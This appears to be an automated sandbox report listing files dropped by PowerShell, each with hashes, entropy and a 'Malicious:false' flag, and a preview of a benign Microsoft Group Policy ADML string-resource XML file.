                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppMgmt_COM_SearchForCLSID">Download missing COM components</string>.. <string id="AppMgmt_COM_SearchForCLSID_Help">This policy setting directs the system to search Active Directory for missing Component Object Model (COM) components that a program requires.....Many Windows programs, such as the MMC snap-ins, use the interfaces provided by the COM components. These programs cannot perform all their functions unless Windows has internally registered the required components.....If you enable this policy setting
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1488), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6011
                                                                                                                                                                                                        Entropy (8bit):5.030765177000099
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmTKr0l1CSYNTV5vDiUFO3q6fWbKldN6joV:EqMRbaW+HN6c
                                                                                                                                                                                                        MD5:F7E00A4ABE6853A853D65FB722604674
                                                                                                                                                                                                        SHA1:9CFD9B20C60FB7024F91A7902D84182081427D7F
                                                                                                                                                                                                        SHA-256:4E01B6A54C1B3933D33645729AF7F69E50D687C37DB985A924917E6F8ACAB15B
                                                                                                                                                                                                        SHA-512:2ADAC9CDA13B12F0C2B2F7E9C9B943B50BE9A217FB32B486F783A5D842A820F2F2928E5336DE6E4FCA4B5CD9FC4F2D7FAA09F6C8285550CA7B3BD19E0CE4CA8B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SSLConfiguration">SSL Configuration Settings</string>.. <string id="SSLCipherSuiteOrder">SSL Cipher Suite Order</string>.. <string id="SSLCipherSuiteOrder_Help">This policy setting determines the cipher suites used by the Secure Socket Layer (SSL)..... If you enable this policy setting, SSL cipher suites are prioritized in the order specified..... If you disable or do not configure this policy setting, the factory default cipher suite order is used..... SSL2, SSL3, TLS 1.0 and T
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10980
                                                                                                                                                                                                        Entropy (8bit):4.778547657476326
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmrrC2ZHEU5p5a4LH/+3SenetLKZHtpeL3DKTGbpKPKryy6JI5oyvr5UV:ESrC2RlFagcSenetKZHtOzrKPKrB5xj+
                                                                                                                                                                                                        MD5:797657FCFBC025F92F896B0095D1F6E4
                                                                                                                                                                                                        SHA1:F357F8B9A9671F711EAE5BEB7759A2EF73B953E9
                                                                                                                                                                                                        SHA-256:032F6BB5FBA082CA24EA70F6CBDC25E913FD43B68A44582AB30AEB29509FC2ED
                                                                                                                                                                                                        SHA-512:9C90FEE9737A7F66CD50B43C30A2BA05DC861A76618612DC744F7075D3296DDE577589060D3CC5779E44CA14ADD42502420DCDF9A68825817795FC89418847DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowPersistAutoAcceptCalls">Allow persisting automatic acceptance of Calls</string>.. <string id="AllowPersistAutoAcceptCalls_Help">Make the automatic acceptance of incoming calls persistent.</string>.. <string id="AppSharing">Application Sharing</string>.. <string id="AudioVideo">Audio &amp; Video</string>.. <string id="DisableAdvCallingButton">Disable the Advanced Calling button</string>.. <string id="DisableAdvCallingButton_Help">Disables the Advanced Calling button on the General Optio
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (545), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6210
                                                                                                                                                                                                        Entropy (8bit):4.659729688008146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm0xrbTb9qSrboXpqjKq+F6TzGQ5wtt1cvWebgbPWLSrbTpKb9LbpqjKm+xN:EXx19axpuN52t16W7WW7p4Xxt49tY
                                                                                                                                                                                                        MD5:02F20EFB8F224DE1BECE4FA4FADF1442
                                                                                                                                                                                                        SHA1:16091D04A7A93CC21A3935841D1F30C643C2A782
                                                                                                                                                                                                        SHA-256:2D07C5B7079ED696AA73A4806A1B1FEB2863B6A579033EF1F0A10E3D5D5E5FBC
                                                                                                                                                                                                        SHA-512:D7239C57FA747F36C770D68BBDF31354A9C53D7A7AA3530CE7367FE612CE04B903142CDBBFCBAC11098D47E00D58B0C6620EF18CE324AD9933CBEB0FB5B6D15D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisallowCpls">Hide specified Control Panel items</string>.. <string id="DisallowCpls_Help">This setting allows you to display or hide specified Control Panel items, such as Mouse, System, or Personalization, from the Control Panel window and the Start screen. The setting affects the Start screen and Control Panel window, as well as other ways to access Control Panel items, such as shortcuts in Help and Support or command lines that use control.exe. This policy has no effect on items displayed in PC settings...
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21011
                                                                                                                                                                                                        Entropy (8bit):4.7324938774717955
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:VfRyKGkSDgF+vXDtchtrWzsbHX92eLb2vB1E4RRN9:VfRXTCrvXDWrWziN2ZvB1fRX
                                                                                                                                                                                                        MD5:61CB7046C23A14515C58521DAD36AB6F
                                                                                                                                                                                                        SHA1:62EC7A88975656944FD8CA72924A916336112465
                                                                                                                                                                                                        SHA-256:A4F9A17502E8ABA9E82C5C324CBED40E109A565CA2E27B3D79389F1A595B3CCD
                                                                                                                                                                                                        SHA-512:13473DEADE6477440D9515C9FC6BABECDB59FE9A806633B003B14E71EC6E762DD9E13A9BFD1DFED554D7CA6A664B3C1EF0CEB7C8278F22CC0E0EEB793E697C1F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Display">Display</string>.. <string id="CPL_Display_Disable">Disable the Display Control Panel</string>.. <string id="CPL_Display_Disable_Help">Disables the Display Control Panel.....If you enable this setting, the Display Control Panel does not run. When users try to start Display, a message appears explaining that a setting prevents the action.....Also, see the "Prohibit access to the Control Panel" (User Configuration\Administrative Templates\Control Panel) and "Remove programs on Settings menu" (User Configuration\Administrative Templates\Star
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
Size (bytes):1585
Entropy (8bit):4.924174965870825
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEBWNvHjWy8XGkjR7S2kjeRqZ+RguJb+RguJM6dGQEn:cgeD5x8gm8fKlBWN7WyeOuJ3uJv3EFV
MD5:3A236D3ED9A6EAE336DE47BD71132D58
SHA1:621C59891B91951F2E863EEFEA2D8310FB5125E3
SHA-256:EF075F5436A4117C29F2D6689A8ED6ACC3BA22EAFBDEEA20C2349DBA5CFE1F33
SHA-512:862AABB60EFFAC016188CF56BB6EC48F7E4F6847B4A1A4A525C1FD93DAA0269E0CB02DC8362F5B3029F817D1096B8C5BB48FA1717FE4084E2A99CDE13A3CE573
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Users">User Accounts</string>.. <string id="Users_Help">Contains settings to control the behavior of User Accounts</string>.. <string id="UseDefaultTile">Apply the default account picture to all users</string>.. <string id="UseDefaultTile_Help">This policy setting allows an administrator to standardize the account pictures for all users on a system to the default account picture. One application for this policy setting is to standardize the account pictures to a company logo.....Note: The default acc

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
Category:dropped
Size (bytes):20162
Entropy (8bit):4.80118154121946
Encrypted:false
SSDEEP:192:EYLfqDwf4tdJ11wpL9uiansm9cjoOkfmW/MQfB:9qtVPaxu5mUTOYJ
MD5:3F887766536AE5C7677E841C9A1E86F6
SHA1:C3BFB966D06DF84A5BD9FCDD9C0CAF23A4F85B28
SHA-256:91A36F497D459EF96B4CEDB88EE0884651D8B5C0EABCE1C1F4FEC6D49FF71A31
SHA-512:7777FF19B4B1108A2688D02F25AC69E3F66D87F44A42AD60596B447188728B231E148E67390B39B7CBCF62E83121ECB55A84CB3D72A55827C0489FADABA5469C
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowDefaultCredentials">Allow delegating default credentials</string>.. <string id="AllowDefaultCredentials_Explain">This policy setting applies to applications using the Cred SSP component (for example: Remote Desktop Connection).....This policy setting applies when server authentication was achieved by using a trusted X509 certificate or Kerberos.....If you enable this policy setting, you can specify the servers to which the user's default credentials can be delegated (default credentials are those that you

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):3126
Entropy (8bit):4.730467503379261
Encrypted:false
SSDEEP:96:LeD5pmUes8vc8gDcwFalisWNFIXwN30M5vYFV:Etes8vc8gowUAvIXwN30M5vYn
MD5:1C00F0E54B646BACA8571FC0B7BE9582
SHA1:0494D0849B95970D96E480C9B00C3694E4D50029
SHA-256:625371BBA40530A9A4A88E167B4870634F7583BB601D16954ED8FF4A0E5242E9
SHA-512:99A2B51A6ADDF470B15DFDC2D3D32CA305113C427CDF7C3B85FD3BD43F17B989B5BEA38BA78821DA5A8978437DD3E484CCB283D9B01B737C05C4B7D82288D749
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CredUI">Credential User Interface</string>.. <string id="CredUI_Help">Contains settings to control the behavior of credential collection.</string>.. <string id="EnumerateAdministrators">Enumerate administrator accounts on elevation</string>.. <string id="EnumerateAdministrators_Help">This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. By default, administrator accounts are not displayed when the user attempts to elevate a ru

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (479), with CRLF line terminators
Category:dropped
Size (bytes):5460
Entropy (8bit):4.757258895669925
Encrypted:false
SSDEEP:96:LeD5pmAznn5XkKkcx1ftU6beY3rqFimzWSsdK/l+3yY8V:Ejznn5XkJcx1fdPrqFOXU/loyb
MD5:B735FF00BD6511F0525C74881042CFBF
SHA1:F9540A99E5654EA5F6B7AAF49CE35F591CEC2863
SHA-256:FF1B853B846EA63064AD460B42C44230DE008297B6A2DDB8DAA48991A5684C14
SHA-512:A585AE89C4B13A6A2DE50D414069FE40D3DB53395A4E79B5865B530ACC6963B2C89647D2735B27229503B58BAC47B4C43B38E6E2BEB00B81EC6F1D76DB441C06
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DefaultLogonDomain">Assign a default domain for logon</string>.. <string id="DefaultLogonDomain_Help">This policy setting specifies a default logon domain, which might be a different domain than the domain to which the computer is joined. Without this policy setting, at logon, if a user does not specify a domain for logon, the domain to which the computer belongs is assumed as the default domain. For example if the computer belongs to the Fabrikam domain, the default domain for user logon is Fabrikam. ....If y

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (353), with CRLF line terminators
Category:dropped
Size (bytes):3490
Entropy (8bit):4.799993012083926
Encrypted:false
SSDEEP:48:cgeD5x8gm8fKwZJBaoC9DxBboMEBar+Nc456uFDPrJNBFiy4jyDznyHSMrmdzcFV:LeD5pm8ZJjQDxXONcOXNB9HyHbrvFV
MD5:8EB6CBECFCFB7FB15E453E235713F0D2
SHA1:37170BA6139BD471C4121ED7747E8C9544E64E4A
SHA-256:23EAF2144B343ACCE5EC33DFB0363BA5B53E1ED8F5E0557F7597F02C1A659B0C
SHA-512:F3B96C2721592E9C5CD8CAF20DACCAE170B46BDBBBD24D4A6D1ACC3CA3D10BFA9AC23DA2B5B3F9CF7D9F7918236C1C686918BB392595C634E97B56070AEDE007
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CADOptions">Ctrl+Alt+Del Options</string>.. <string id="DisableChangePassword">Remove Change Password</string>.. <string id="DisableChangePassword_Help">This policy setting prevents users from changing their Windows password on demand.....If you enable this policy setting, the 'Change Password' button on the Windows Security dialog box will not appear when you press Ctrl+Alt+Del.....However, users are still able to change their password when prompted by the system. The system prompts users for a new pass

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (507), with CRLF line terminators
Category:dropped
Size (bytes):5072
Entropy (8bit):4.789995597871682
Encrypted:false
SSDEEP:96:LeD5pmc4qzQuQ+kCO+QW9JvqIiErBAqHPkGitHqEJw2mL8ykL3/NBV:El4qE9+kCOtW9dqIiErBAgPk/tKEJw2D
MD5:7DF9E61D5F72660A48741A9D1AE6DF2A
SHA1:A623BD2021EAA8863519E110E2C4D141D68E6DEE
SHA-256:BD0E69BF353115E23B4344875DA15DF78BD4ADF676EEAB35AED30A21C129EBED
SHA-512:726FC2BD5444E1791811C9F39B3B535D155AA0BA2AC8B50F7A8B6FAF48E7BEDBD542C96C701A1CD58B1C89B89DA04D9C175E9CCDE70DA27C92E073E570138DD1
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DCOM">Distributed COM</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList">Allow local activation security check exemptions</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList_Explain">Allows you to specify that local computer administrators can supplement the "Define Activation Security Check exemptions" list.....If you enable this policy setting, and DCOM does not find an explicit entry for a DCOM server application id (appid) in the "Define Activation Security Check exemptions

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1550
Entropy (8bit):4.934966284712348
Encrypted:false
SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yAyjP9jlFxUy3QviR0IhjV:cgeD5x8gm8fK0jlFxUM7FV
MD5:59649458234FA8EC0FA1CCF6D1A1F000
SHA1:FA84DC8C633AC66D93C2CC4CA82973690CC01B06
SHA-256:7C621BDFA9AAFBB72C6E3EAA6BD9DADB9B87B76FF3085C3AB85F94A4BA74148B
SHA-512:3DAC7345CDF6E474EC6550890D2581E97CECCBDF3D6DA446D0B4051600B81E66725E20E3905FC8ED051E00AE74B7899ECEC073C828E776FB664731218F88E528
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DFSDiscoverDC">Configure how often a DFS client discovers domain controllers</string>.. <string id="DFSDiscoverDC_Help">This policy setting allows you to configure how often a Distributed File System (DFS) client attempts to discover domain controllers on a network. By default, a DFS client attempts to discover domain controllers every 15 minutes.....If you enable this policy setting, you can configure how often a DFS client attempts to discover domain controllers. This value is specified in minutes.....If you

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4823
Entropy (8bit):4.829103521253636
Encrypted:false
SSDEEP:96:LeD5pm8i9yPYwH70day2JGkA5mZAOtfMtlV:E1i9Yn0zMA3G6
MD5:8C0C1F2AC3237B8AA71F88A5650C0E68
SHA1:8A39FC535339841CC7573B1DCFF729CEC8E54114
SHA-256:844BF77E54E0C353537B0D1349F0173049DD36C0CB64EAEE900663CD0A227AB4
SHA-512:C6F8AC395D011EC45EBF47812EBEBF7E152DB6A943566B744AA83B22529DF07E3D0749D008B5F3A8A46953CCCF39305966869E5EFE502B1E727CF55ED7A05F4F
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CAT_DesktopWindowManager">Desktop Window Manager</string>.. <string id="CAT_DesktopWindowManagerColorization">Window Frame Coloring</string>.. <string id="DwmDefaultColorizationColor">Specify a default color</string>.. <string id="DwmDefaultColorizationColorExplain">This policy setting controls the default color for window frames when the user does not specify a color. ....If you enable this policy setting and specify a default color, this color is used in glass window frames, if the user does not sp

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
Category:dropped
Size (bytes):22651
Entropy (8bit):4.740040645096249
Encrypted:false
SSDEEP:384:sHlNSiouVHqVHdjZjfYBi1lkmX15/5GYyr2cci:qNSiVs9jBwBiHk0v/5Grrh
MD5:3B0954050C6DFF90CAE771936C61F536
SHA1:5D6D1097DE13011B78271272B87DE55C2BFFCEA8
SHA-256:F8DA2C6952EBABA7C70F5BB5941532A2E6112955E3E340F003581E96BB7B0881
SHA-512:097C9E8A0B5BC0B97777F6A591E7CEF5A2362668B05C42624593069FD4F2E6279EA8D83CBCADA7C973E9E1CCED78B1149889A333021FA904A23BF0D6FBEC06FC
Malicious:false
Preview:<?xml version="1.0" encoding="utf-8"?>..<!-- (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDesktop">Desktop</string>.. <string id="ActiveDirectory">Active Directory</string>.. <string id="AD_EnableFilter">Enable filter in Find dialog box</string>.. <string id="AD_EnableFilter_Help">Displays the filter bar above the results of an Active Directory search. The filter bar consists of buttons for applying additional filters to search results.....If you enable this setting, the filter bar appears when the Active Directory Find dialog box opens, but users can hide it.....If you disable this
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1012
                                                                                                                                                                                                        Entropy (8bit):5.014566400985145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFMNWe2PEYLdFV:cgeD5x8gm8fKOE+FV
                                                                                                                                                                                                        MD5:8C5BFC23602CF18E6EC73BDF468C5C65
                                                                                                                                                                                                        SHA1:87C49103ECB11F3284DE1311D305CE426DA77573
                                                                                                                                                                                                        SHA-256:5FE3FC627DFAEDDEDDD5C617D4DDD1AB367353A97026268C27AB45B8A9025472
                                                                                                                                                                                                        SHA-512:ED4BF6B6D7F2F5B248DF14DAA85551613583E8DCFD734266E08296F0DCB52055A2CAD56C23DDFA20EA3315A9DD3B3D538EE673C89E97CFC8D5D9BE39BB575794
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceCompat">Device and Driver Compatibility</string>.. <string id="DeviceFlags">Device compatibility settings</string>.. <string id="DriverShims">Driver compatibility settings</string>.. <string id="DeviceFlags_Help">Changes behavior of Microsoft bus drivers to work with specific devices.</string>.. <string id="DriverShims_Help">Changes behavior of 3rd-party drivers to work around incompatibilities introduced between OS versions.</string>.. </stringTable>.. </resources>..</policyDefinition
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (671), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20516
                                                                                                                                                                                                        Entropy (8bit):4.656487634133671
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:/Zy2dT4b3O+5KeqO+cpm964BNLKsuV2r4tFHsAvRzw3g:/ZBub+EKebxpm97ODVy4rHb5EQ
                                                                                                                                                                                                        MD5:B0D80E37838946A958789511D6090800
                                                                                                                                                                                                        SHA1:E80EBC94D870B40E9925D9473E83438287A3DF50
                                                                                                                                                                                                        SHA-256:EAD0368B0AB7404ADDC0B8BD016E04D43C7A1E370A2875A6785863A53CC94095
                                                                                                                                                                                                        SHA-512:A13D7AA56FA39803B8CB441DD6907A0F06E2B89EB478B6C6D57687F0E154DE44EF959411627C33D5652D096E439F6518C624A4F159189C8DA7AD51370FB12AD3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_AllowAdminInstall">Allow administrators to override Device Installation Restriction policies</string>.. <string id="DeviceInstall_AllowAdminInstall_Help">This policy setting allows you to determine whether members of the Administrators group can install and update the drivers for any device, regardless of other policy settings.....If you enable this policy setting, members of the Administrators group can use the Add Hardware wizard or the Update Driver wizard to install and update the drivers for
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8722
                                                                                                                                                                                                        Entropy (8bit):4.755555827203055
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm90hTxQOL2iYoQkdN+Rn+kJu+G6f9Yh3VfPtvCchfvaCz+51qMnHV:EbTmUvQkdN+F+au+G6etntbz+5su
                                                                                                                                                                                                        MD5:9E7C326DCCFD5BDAE53F0FF7359042CF
                                                                                                                                                                                                        SHA1:BFC33D23A42406EF057AC21BCECA4310C256C901
                                                                                                                                                                                                        SHA-256:4E1BC9FDA548EEBF29A499B61CE0462983DD461DB84F4B2C63150636B917036B
                                                                                                                                                                                                        SHA-512:96C937F5F6871D7BD0F3FDF0B6D502232C29C6E77DE7B1FD0A79DB4ADBC7EAAFBC0A60C76C8AF6D5D85CA7397A4C995BE385320C64D23076A7658C1B1187A624
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_BalloonTips">Turn off "Found New Hardware" balloons during device installation</string>.. <string id="DeviceInstall_BalloonTips_Help">This policy setting allows you to turn off "Found New Hardware" balloons during device installation.....If you enable this policy setting, "Found New Hardware" balloons do not appear while a device is being installed.....If you disable or do not configure this policy setting, "Found New Hardware" balloons appear while a device is being installed, unless the driver
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1186
                                                                                                                                                                                                        Entropy (8bit):5.006514157459994
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEgDfJvRl9xCRMRq9MXJz1c2igRE3RwMwFxRjX/5Ron:cgeD5x8gm8fKqTtW9M71ibKMFV
                                                                                                                                                                                                        MD5:A4EECA9FC18FD2F595ECC98FD40E0F5F
                                                                                                                                                                                                        SHA1:EFBAB95F94C418BE4B025F3CA14BA3441C1D7CE8
                                                                                                                                                                                                        SHA-256:348B0A60BCA267759CA52611C67B06AB3347CAB23786C257D984EB7F3F94C6A2
